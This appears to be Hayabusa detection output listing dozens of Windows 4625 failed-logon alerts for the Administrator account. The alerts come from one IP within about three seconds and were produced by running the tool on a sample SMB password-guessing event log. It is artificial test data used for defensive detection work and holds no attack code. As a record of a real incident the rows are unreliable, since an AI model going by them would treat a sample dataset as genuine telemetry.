01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RWP4luPa3lFolQVI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5K9DQWbzslRZZMSC | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5qm0L113v24jlfjx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seuUjyGmNlyYT4tU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FljAF4LWLmWNa3kL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RnN5mBOaAvYu25G7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: llBt31S46QVzg0Ki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: b1rvJUZo91Kka0G1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Zqi86ZSFGRnoFM4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GeyeVdCUmHEKxR8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DwxJVXt79KBZalqS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TDfRu1OTlHmyc38P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OLCAMPDWti9hjHtV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k2eViuJeorX2peGP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: davOE9p1fF2LbDP7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YFQsEbZnm94eSuUl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UnNcBIPoWdJH0x7M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Fw1xVFyar0Cal2J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FWzn4Oa8PQdH9Gqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b68beIB5BKyMv8d3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HeXSJhEXzpiRX8BT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BQ8Zu7ByLWddD4Tk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: paQzUptV8scmJvsG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WQLsoIX9LPvbockz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRYbdVMbUlqFK8oM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OSO730O1fxDL4DfQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5wmniv339HLGKB4u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rO3mxvgSES0lVN34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fvK9k9tnCq5hwBqe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ujFfMT6I6L8OHag9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FWKY2Wh21sePUR1L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6E6yf8D5cPOEwR0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OpFho8k52BkBlg4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucDvfSfDYZzjNWFS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vnq3S0gEE98xfYLv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seVfaEdAS6lEXgkG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gz8BQAlyYXB61tx3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkHLs6yikRWVjj9F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0bQUcnUBCmE81G6I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BceDCcXoHJQv9pDi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GCCLt49g8wmAMEyV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pM6C8KRcxVIUsZrZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fw5DU6l3QRVl9cWY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37UthbuO3m4Lr7dU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: URB7Ji5pQleLtvy4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: orP9OgiBrYIKZPXE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZwvdnlIWhqoDg8On | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v6dXVbmLBpXc39ah | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Mu7amiHAg0l7bza | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JdG6F697kAXFDx9m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jY5AAnfQMH3VZQUa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iVep4j7jZZAOAQAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KWWtGIQx8jBgAeoH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zn8X8gen8gX9i3QK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B9OdUM99RBHzwgVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJbBVm6wDrqyQmpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tAVRBfMxIyrfsEtR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wuCIClZihRxRyjGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxhpEP6nnmihvkHB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1HYmJDrWmKjj8DF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V81dIfR2SRNDk3a2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vaZpLaxB1kcCXqHP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JRhs8IoV6R6vyCdL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4wUYds3Ym3G2abrV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tmBfxm6pPLlSEsUI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VbAuqFggx0zz5iEn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8cytpVOjb4KrNaGg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BFFFt7eFzmlzbHhG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJQBZZiNKVGXzx4A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7gyu6EyrtbyowTfC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aASpkRuPfE8Nl64n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MSI2b7LpZpWO3xJW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: avNkOq3fsGN3yYJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wnlgy6dW33tRk6UX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: msJ8QrqMluTeUlM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
